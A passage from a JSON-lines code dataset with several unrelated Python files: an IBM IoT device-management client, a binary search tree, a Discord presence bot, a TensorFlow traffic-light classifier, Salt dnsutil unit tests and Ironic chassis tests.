resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\n\tdef setErrorCode(self, errorCode=0):\n\t\tif errorCode is None:\n\t\t\terrorCode = 0;\n\n\t\tself._errorCode = errorCode\n\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to publish error code because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"d\": { \"errorCode\": errorCode },\n\t\t\t\"reqId\": reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.ADD_ERROR_CODE_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.ADD_ERROR_CODE_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\tdef clearErrorCodes(self):\n\t\tself._errorCode = None\n\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to clear error codes because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"reqId\": reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.CLEAR_ERROR_CODES_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.CLEAR_ERROR_CODES_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\tdef addLog(self, msg=\"\",data=\"\",sensitivity=0):\n\t\ttimestamp = datetime.now().isoformat()\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to publish error code because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"d\": {\n\t\t\t\t\"message\": msg,\n \"timestamp\": timestamp,\n \"data\": data,\n \"severity\": sensitivity\n },\n\t\t\t\"reqId\": reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.ADD_LOG_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.ADD_LOG_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\tdef 
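exampleDiagnosticsUsage(self):\n\t\t# Illustrative sketch (hypothetical helper, not part of the original API):\n\t\t# publish an error code and a diagnostic log entry, then block until the\n\t\t# platform acknowledges the log request. Signatures match setErrorCode()\n\t\t# and addLog() above; the argument values are examples only.\n\t\tself.setErrorCode(12)\n\t\tpending = self.addLog(msg=\"example\", data=\"\", sensitivity=0)\n\t\tif pending is not None:\n\t\t\tpending.wait(timeout=10)\n\n\tdef 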
clearLog(self):\n\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to clear log because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"reqId\": reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.CLEAR_LOG_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.CLEAR_LOG_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\n\tdef __onDeviceMgmtResponse(self, client, userdata, pahoMessage):\n\n\t\twith self._recvLock:\n\t\t\tself.recv = self.recv + 1\n\n\t\ttry:\n\t\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\t\tif 'rc' not in data:\n\t\t\t\treturn True\n\t\t\trc = data['rc']\n\t\t\treqId = data['reqId']\n\t\texcept ValueError as e:\n\t\t\traise Exception(\"Unable to parse JSON. payload=\\\"%s\\\" error=%s\" % (pahoMessage.payload, str(e)))\n\t\telse:\n\t\t\trequest = None\n\t\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\t\ttry:\n\t\t\t\t\trequest = self._deviceMgmtRequestsPending.pop(reqId)\n\t\t\t\texcept KeyError:\n\t\t\t\t\tself.logger.warning(\"Received unexpected response from device management: %s\" % (reqId))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.debug(\"Remaining unprocessed device management requests: %s\" % (len(self._deviceMgmtRequestsPending)))\n\n\n\t\t\tif request is None:\n\t\t\t\treturn False\n\n\t\t\tif request['topic'] == ManagedClient.MANAGE_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Manage action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\t\tself.readyForDeviceMgmt.set()\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Manage action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.UNMANAGE_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Unmanage action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\t\tself.readyForDeviceMgmt.clear()\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Unmanage action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.UPDATE_LOCATION_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Location update action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Location update action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.ADD_ERROR_CODE_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Add error code action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Add error code action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.CLEAR_ERROR_CODES_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Clear error codes action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Clear error codes action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.ADD_LOG_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Add log action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Add 
log action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.CLEAR_LOG_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Clear log action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Clear log action failed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\telse:\n\t\t\t\tself.logger.warning(\"[%s] Unknown action response: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\t# Now clear the event, allowing anyone that was waiting on this to proceed\n\t\t\trequest[\"event\"].set()\n\t\t\treturn True\n\n\t#Device Action Handlers\n\tdef __onRebootRequest(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_REBOOT_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\ttry:\n\t\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\t\treqId = data['reqId']\n\t\t\tif self.deviceActionCallback : self.deviceActionCallback(reqId,\"reboot\")\n\t\texcept ValueError as e:\n\t\t\traise Exception(\"Unable to process Reboot request. payload=\\\"%s\\\" error=%s\" % (pahoMessage.payload, str(e)))\n\n\tdef __onFactoryResetRequest(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_FACTORY_REESET,pahoMessage.payload.decode(\"utf-8\")))\n\t\ttry:\n\t\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\t\treqId = data['reqId']\n\t\t\tif self.deviceActionCallback : self.deviceActionCallback(reqId,\"reset\")\n\t\texcept ValueError as e:\n\t\t\traise Exception(\"Unable to process Factory Reset request. payload=\\\"%s\\\" error=%s\" % (pahoMessage.payload, str(e)))\n\n\tdef respondDeviceAction(self,reqId,responseCode=202,message=\"\"):\n\t\tresponse ={\n\t\t\t\t \"rc\": responseCode,\n\t\t\t\t \"message\": message,\n\t\t\t\t \"reqId\": reqId\n\t\t\t\t}\n\t\tpayload=json.dumps(response)\n\t\tself.logger.info(\"Publishing Device Action response with payload :%s\" % payload)\n\t\tself.client.publish('iotdevice-1/response', payload,qos=1, retain=False)\n\n\t#Firmware Handlers\n\tdef __onFirmwereDownload(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_FIRMWARE_DOWNLOAD_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\trc = ManagedClient.RESPONSECODE_ACCEPTED\n\t\tmsg =\"\"\n\t\tif self.__firmwareUpdate.state != ManagedClient.UPDATESTATE_IDLE :\n\t\t\trc = ManagedClient.RESPONSECODE_BAD_REQUEST\n\t\t\tmsg = \"Cannot download as the device is not in idle state\"\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,rc,msg)).start()\n\t\tif self.firmwereActionCallback :\n\t\t\tself.firmwereActionCallback(\"download\",self.__firmwareUpdate)\n\n\n\tdef __onFirmwereCancel(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_CANCEL_OBSERVE_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,200,\"\")).start()\n\n\tdef __onFirmwereObserve(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_OBSERVE_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = 
json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\t#TODO : Proprer validation for fields in payload\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,200,\"\")).start()\n\n\tdef __onUpdatedDevice(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_UPDATE_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\td=data['d']\n\t\tvalue = None\n\t\tfor obj in d['fields'] :\n\t\t\tif 'field' in obj :\n\t\t\t\tif obj['field'] == \"mgmt.firmware\" :\n\t\t\t\t\tvalue = obj[\"value\"]\n\t\tif value != None :\n\t\t\tself.__firmwareUpdate = DeviceFirmware(value['version'],value['name'],value['uri'],value['verifier'],value['state'],value['updateStatus'],value['updatedDateTime'])\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,204,\"\")).start()\n\n\tdef setState(self,status):\n\t\tnotify = {\"d\":{\"fields\":[{\"field\":\"mgmt.firmware\",\"value\":{\"state\":status}}]}}\n\t\tif self.__firmwareUpdate != None :\n\t\t\tself.__firmwareUpdate.state = status\n\n\t\tself.logger.info(\"Publishing state Update with payload :%s\" % json.dumps(notify))\n\t\tthreading.Thread(target= self.client.publish,args=('iotdevice-1/notify',json.dumps(notify),1, False)).start()\n\n\tdef setUpdateStatus(self,status):\n\t\tnotify = {\"d\":{\"fields\":[{\"field\":\"mgmt.firmware\",\"value\":{\"state\":ManagedClient.UPDATESTATE_IDLE,\"updateStatus\":status}}]}}\n\t\tif self.__firmwareUpdate != None :\n\t\t\tself.__firmwareUpdate.state = ManagedClient.UPDATESTATE_IDLE\n\t\t\tself.__firmwareUpdate.updateStatus = status\n\n\t\tself.logger.info(\"Publishing Update Status with payload :%s\" % json.dumps(notify))\n\t\tthreading.Thread(target= self.client.publish,args=('iotdevice-1/notify',json.dumps(notify),1, False)).start()\n\n\tdef __onFirmwereUpdate(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_FIRMWARE_UPDATE_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\trc = ManagedClient.RESPONSECODE_ACCEPTED\n\t\tmsg =\"\"\n\t\tif self.__firmwareUpdate.state != ManagedClient.UPDATESTATE_DOWNLOADED :\n\t\t\trc = ManagedClient.RESPONSECODE_BAD_REQUEST\n\t\t\tmsg = \"Firmware is still not successfully downloaded.\"\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,rc,msg)).start()\n\t\tif self.firmwereActionCallback :\n\t\t\tself.firmwereActionCallback(\"update\",self.__firmwareUpdate)\n\n\tdef __onDMEActionRequest(self,client,userdata,pahoMessage):\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\"\n\t\t % (ManagedClient.DME_ACTION_TOPIC,data))\n\t\treqId = data['reqId']\n\t\tif self.dmeActionCallback :\n\t\t\tif self.dmeActionCallback(pahoMessage.topic,data,reqId):\n\t\t\t\tmsg = \"DME Action successfully completed from Callback\"\n\t\t\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,200,msg)).start()\n\t\t\telse:\n\t\t\t\tmsg = \"Unexpected device error\"\n\t\t\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,500,msg)).start()\n\n\t\telse :\n\t\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,501,\"Operation not implemented\")).start()\n\n\ndef ParseConfigFile(configFilePath):\n\tparms = 
configparser.ConfigParser({\"domain\": \"internetofthings.ibmcloud.com\",\n\t                           \"port\": \"8883\",\"clean-session\": \"true\"})\n\tsectionHeader = \"device\"\n\ttry:\n\t\twith open(configFilePath) as f:\n\t\t\ttry:\n\t\t\t\tparms.read_file(f)\n\t\t\texcept AttributeError:\n\t\t\t\t# Python 2.7 support\n\t\t\t\t# https://docs.python.org/3/library/configparser.html#configparser.ConfigParser.read_file\n\t\t\t\tparms.readfp(f)\n\n\t\tdomain = parms.get(sectionHeader, \"domain\")\n\t\torganization = parms.get(sectionHeader, \"org\")\n\t\tdeviceType = parms.get(sectionHeader, \"type\")\n\t\tdeviceId = parms.get(sectionHeader, \"id\")\n\t\tauthMethod = parms.get(sectionHeader, \"auth-method\")\n\t\tauthToken = parms.get(sectionHeader, \"auth-token\")\n\t\tcleanSession = parms.get(sectionHeader, \"clean-session\")\n\t\tport = parms.get(sectionHeader, \"port\")\n\n\texcept IOError as e:\n\t\treason = \"Error reading device configuration file '%s' (%s)\" % (configFilePath,e.strerror)\n\t\traise ConfigurationException(reason)\n\n\treturn {'domain': domain, 'org': organization, 'type': deviceType,\n\t        'id': deviceId, 'auth-method': authMethod, 'auth-token': authToken,\n\t\t\t'clean-session': cleanSession, 'port': port}\n","sub_path":"src/Raspberry/LeoNickTEAM/ibmiotf/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":35027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"427469630","text":"class BSTNode:\n    def __init__(self,val):\n        self.val = val\n        self.parent = None\n        self.left = None\n        self.right = None\n\n    def insert(self,newnode):\n        if newnode.val < self.val:\n            if self.left is not None:\n                return self.left.insert(newnode)\n            else:\n                self.left = newnode\n                newnode.parent = self\n        elif self.right is not None:\n            return self.right.insert(newnode)\n        else:\n            self.right = newnode\n            newnode.parent = self\n    def inordertravel(self):\n        if self.left is not None:\n            self.left.inordertravel()\n        print(self.val)\n        if self.right is not None:\n            self.right.inordertravel()\n\n    def findmin(self):\n        if self.left is None:\n            return self\n        else:\n            return self.left.findmin()\n\n    def findmax(self):\n        if self.right is None:\n            return self\n        else:\n            return self.right.findmax()\n\n    def successor(self):\n        if self.right is not None:\n            return self.right.findmin()\n        pointer = self\n        while pointer.parent is not None and pointer is pointer.parent.right:\n            pointer = pointer.parent\n        return pointer.parent\n\n    def successive(self):\n        if self.left is not None:\n            return self.left.findmax()\n        pointer = self\n        while pointer.parent is not None and pointer is pointer.parent.left:\n            pointer = pointer.parent\n        return pointer.parent\n\n    def delete(self):#delete the node and return it (assumes the node has a parent)\n        if self.left is None or self.right is None:\n            if self.parent.left == self:\n                self.parent.left = self.left or self.right\n                if self.parent.left is not None:\n                    self.parent.left.parent = self.parent\n            else:\n                self.parent.right = self.left or self.right\n                if self.parent.right is not None:\n                    self.parent.right.parent = self.parent\n            return self\n        else:\n            pointer = self.successor()\n            self.val, pointer.val = pointer.val, self.val\n            return pointer.delete()\n","sub_path":"L5.py","file_name":"L5.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"507086598","text":"import discord\nimport datetime\nimport logging\nimport asyncio\n\nlogging.basicConfig(format=\"%(asctime)s %(funcName)s : %(levelname)s : %(message)s\",\n                    
level=logging.INFO)\n\nimport os  # used to read the bot token from the environment\n\napp = discord.Client()\nprev_music = \"\"\n\n# Read the bot token from an environment variable; never hardcode credentials\ntoken = os.environ.get(\"DISCORD_TOKEN\")\n\n@app.event\nasync def on_ready():\n    print(\"Logging in as:\\n ID : {}\\n password : {}\".format(app.user.name, app.user.id))\n    print(\"=================\")\n    await app.change_presence(activity=discord.Game(name=\"Idle\", type=0), status=discord.Status.idle)\n    return await update()\n\nasync def update():\n    global prev_music\n\n    while True:\n        with open(\"musicInfo\", \"r\") as f:\n            # strip the trailing newline so comparisons like == \"stop\" work\n            current_music = f.readline().strip()\n\n        if not current_music == prev_music:\n            # remember the new state so the presence is only updated on changes\n            prev_music = current_music\n            if current_music == \"stop\":\n                await app.change_presence(activity=discord.Game(name=\"Idle\"), status=discord.Status.idle)\n            else:\n                await app.change_presence(activity=discord.Game(name=f\"Happily playing {current_music}\", type=0), status=discord.Status.online)\n\n        await asyncio.sleep(1)\n\napp.run(token)\n","sub_path":"bot_presence.py","file_name":"bot_presence.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"575092426","text":"#from styx_msgs.msg import TrafficLight\n\nimport os\nimport sys\nfrom glob import glob\nfrom PIL import Image\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\nimport random\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight\n\n## load SSD trained on udacity's simulator images\nPATH_TO_GRAPH = r'./light_classification/model/sim/8_batch/frozen_inference_graph.pb' \n\nPATH_TO_LABELS = r'./light_classification/model/udacity_label_map.pbtxt'\nNUM_CLASSES = 13\n\n#if the score is under this value, unknown state is returned.\nMINIMUM_SCORE_THRESHOLD =0.2\n\n# red in .pb output\nRED_LIGHT=1\n\n\n# .pb file\n#subfolder = ['Green', 'Red', 'Yellow', 'Unknown']\n\n#styx_msgs/msg/TrafficLight.msg\n#uint8 UNKNOWN=4\n#uint8 GREEN=2\n#uint8 YELLOW=1\n#uint8 RED=0\n\n# .pb -> msg\n#convertedColor=[2,0,1,4]\n\nclass TLClassifier(object):\n    def __init__(self):\n        detection_graph = self.load_graph(PATH_TO_GRAPH)\n        label_map = label_map_util.load_labelmap(PATH_TO_LABELS)\n        categories = label_map_util.convert_label_map_to_categories(\n            label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\n        category_index = label_map_util.create_category_index(categories)\n        print(category_index)\n        detection_graph.as_default()\n\n        self.sess = tf.Session(graph= detection_graph)\n\n        self.image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n        self.detect_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n        self.detect_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n        self.detect_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n        self.num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n    def get_classification(self, image):\n        \"\"\"Determines the color of the traffic light in the image\n\n        Args:\n            image (cv::Mat): image containing the traffic light\n\n        Returns:\n            int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n        \"\"\"\n        #TODO implement light color prediction\n        #image_np = self.load_image_into_numpy_array(image)\n        global MINIMUM_SCORE_THRESHOLD\n        global RED_LIGHT\n        image_np = image\n        image_expanded = np.expand_dims(image_np, axis=0)\n\n        (boxes, scores, classes, num) = self.sess.run(\n            [self.detect_boxes, self.detect_scores, 
self.detect_classes, self.num_detections],\n feed_dict={self.image_tensor: image_expanded})\n\n # print('SCORES')\n # print(scores[0])\n # print('CLASSES')\n # print(classes[0])\n\n\n #sys.stderr.write(\"score:classes: \" + str(scores[0]) + \"--------\" + str(classes[0]) + \"\\n\" )\n\n if scores[0][0] > MINIMUM_SCORE_THRESHOLD and int(classes[0][0]) == RED_LIGHT : # 1 is RED in .pb \n sys.stderr.write(\"[RED] detected...\" + \"\\n\")\n return TrafficLight.RED\n else:\n sys.stderr.write(\"[^RED] detected...\" + \"\\n\")\n return TrafficLight.UNKNOWN\n\n\n\n def load_graph(self,graph_file):\n \"\"\"Loads a frozen inference graph\"\"\"\n graph = tf.Graph()\n with graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(graph_file, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n return graph\n \n \n def load_image_into_numpy_array(self,image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape((im_height, im_width, 3)).astype(np.uint8)\n\n\n\n \n\n\n","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"267667932","text":"# -*- coding: utf-8 -*-\n'''\n :codeauthor: :email:`Nicole Thomas `\n'''\n\n# Import Salt Testing Libs\nfrom salttesting import TestCase\nfrom salttesting.mock import MagicMock, patch, mock_open, call\nfrom salttesting.helpers import ensure_in_syspath\n\nensure_in_syspath('../../')\n\n#Import Salt Libs\nfrom salt.modules import dnsutil\n\nmock_hosts_file = '##\\n'\\\n '# Host Database\\n'\\\n '#\\n'\\\n '# localhost is used to configure the loopback interface\\n'\\\n '# when the system is booting. Do not change this entry.\\n'\\\n '##\\n'\\\n '127.0.0.1\tlocalhost\\n'\\\n '255.255.255.255\tbroadcasthost\\n'\\\n '::1 localhost\\n'\\\n 'fe80::1%lo0\tlocalhost'\n\nmock_hosts_file_rtn = {'::1': ['localhost'], '255.255.255.255': ['broadcasthost'],\n '127.0.0.1': ['localhost'], 'fe80::1%lo0': ['localhost']}\n\nmock_calls_list = [call.read(), call.write('##\\n'),\n call.write('# Host Database\\n'),\n call.write('#\\n'),\n call.write('# localhost is used to configure the loopback interface\\n'),\n call.write('# when the system is booting. 
Do not change this entry.\\n'),\n call.write('##\\n'),\n call.write('127.0.0.1 localhost'),\n call.write('\\n'),\n call.write('255.255.255.255 broadcasthost'),\n call.write('\\n'),\n call.write('::1 localhost'),\n call.write('\\n'),\n call.write('fe80::1%lo0 localhost'),\n call.write('\\n'),\n call.close()]\n\n\nclass DNSUtilTestCase(TestCase):\n\n def test_parse_hosts(self):\n with patch('salt.utils.fopen', mock_open(read_data=mock_hosts_file)):\n self.assertEqual(dnsutil.parse_hosts(), {'::1': ['localhost'],\n '255.255.255.255': ['broadcasthost'],\n '127.0.0.1': ['localhost'],\n 'fe80::1%lo0': ['localhost']})\n\n @patch('salt.modules.dnsutil.parse_hosts', MagicMock(return_value=mock_hosts_file_rtn))\n def test_hosts_append(self):\n with patch('salt.utils.fopen', mock_open(read_data=mock_hosts_file)) as m_open:\n dnsutil.hosts_append('/etc/hosts', '127.0.0.1', 'ad1.yuk.co,ad2.yuk.co')\n helper_open = m_open()\n helper_open.write.assert_called_once_with('\\n127.0.0.1 ad1.yuk.co ad2.yuk.co')\n\n def test_hosts_remove(self):\n toRemove = 'ad1.yuk.co'\n new_mock_file = mock_hosts_file + '\\n127.0.0.1 ' + toRemove + '\\n'\n with patch('salt.utils.fopen', mock_open(read_data=new_mock_file)) as m_open:\n dnsutil.hosts_remove('/etc/hosts', toRemove)\n helper_open = m_open()\n calls_list = helper_open.method_calls\n self.assertEqual(calls_list, mock_calls_list)\n","sub_path":"tests/unit/modules/dnsutil_test.py","file_name":"dnsutil_test.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178457283","text":"# Dependencies\nfrom bs4 import BeautifulSoup as bs\nfrom pprint import pprint\nfrom splinter import Browser\nfrom time import sleep\nimport pandas as pd\n\ndef scrape():\n\n # Windows executable path\n executable_path = {'executable_path': '/Users/jhonp/Downloads/chromedriver'}\n b = Browser('chrome', **executable_path, headless=False)\n\n # Mac executable path\n # executable_path = {'executable_path': '/usr/local/bin/chromedriver'}\n # b = Browser('chrome', **executable_path, headless=False)\n\n news_title, news_p = mars_news(b)\n \n results = {\n 'title': news_title,\n 'paragraph': news_p,\n 'image_URL': jpl_image(b),\n 'weather': mars_weather_tweet(b),\n 'facts': mars_facts(),\n 'hemispheres': mars_hemis(b),\n }\n\n b.quit()\n return results\n\ndef mars_news(b):\n url = 'https://mars.nasa.gov/news/'\n b.visit(url)\n html = b.html\n mars_bs = bs(html, 'lxml')\n\n news_title = mars_bs.find('div', class_='content_title').text\n news_p = mars_bs.find('div', class_='article_teaser_body').text\n return news_title, news_p\n\ndef jpl_image(b):\n url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n b.visit(url)\n\n b.click_link_by_partial_text('FULL IMAGE')\n sleep(1)\n b.click_link_by_partial_text('more info')\n\n html = b.html\n image_soup = bs(html, 'lxml')\n\n feat_img_url = image_soup.find('figure', class_='lede').a['href']\n feat_img_full_url = f'https://www.jpl.nasa.gov{feat_img_url}'\n return feat_img_full_url\n\ndef mars_weather_tweet(b):\n url = 'https://twitter.com/marswxreport?lang=en'\n b.visit(url)\n html = b.html\n tweet_soup = bs(html, 'lxml')\n \n first_tweet = tweet_soup.find('p', class_='TweetTextSize').text\n return first_tweet\n \ndef mars_facts():\n url = 'https://space-facts.com/mars/'\n tables = pd.read_html(url)\n df = tables[0]\n df.columns = ['Property', 'Value']\n df.set_index('Property', inplace=True)\n \n return df.to_html()\n \ndef mars_hemis(b):\n url = 
'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n b.visit(url)\n \n html = b.html\n hemi_soup = bs(html, 'html.parser')\n\n hemi_strings = []\n links = hemi_soup.find_all('h3')\n \n for hemi in links:\n hemi_strings.append(hemi.text)\n\n hemisphere_image_urls = []\n\n # Loop through the hemisphere links to gather the images\n for hemi in hemi_strings:\n hemi_dict = {}\n \n b.click_link_by_partial_text(hemi)\n hemi_dict['img_url'] = b.find_by_text('Sample')['href']\n hemi_dict['title'] = hemi\n hemisphere_image_urls.append(hemi_dict)\n pprint(hemisphere_image_urls)\n \n b.click_link_by_partial_text('Back')\n \n return hemisphere_image_urls","sub_path":"Web-Scraping-Challenge/Web-Scraping-Challenge/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"429909964","text":"# Copyright (c) 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport six\nfrom tempest.lib.common.utils import data_utils\nfrom tempest.lib import exceptions\n\nfrom ironicclient.tests.functional import base\n\n\nclass ChassisSanityTestIronicClient(base.FunctionalTestBase):\n \"\"\"Sanity tests for testing actions with Chassis.\n\n Smoke test for the Ironic CLI commands which checks basic actions with\n chassis command like create, show, update, delete etc.\n \"\"\"\n def setUp(self):\n super(ChassisSanityTestIronicClient, self).setUp()\n self.chassis = self.create_chassis()\n\n def test_chassis_create(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) check that chassis has been successfully created\n \"\"\"\n chassis_list_uuid = self.get_chassis_uuids_from_chassis_list()\n self.assertIn(self.chassis['uuid'], chassis_list_uuid)\n\n def test_chassis_delete(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) check that chassis has been successfully created\n 3) delete chassis\n 4) check that chassis 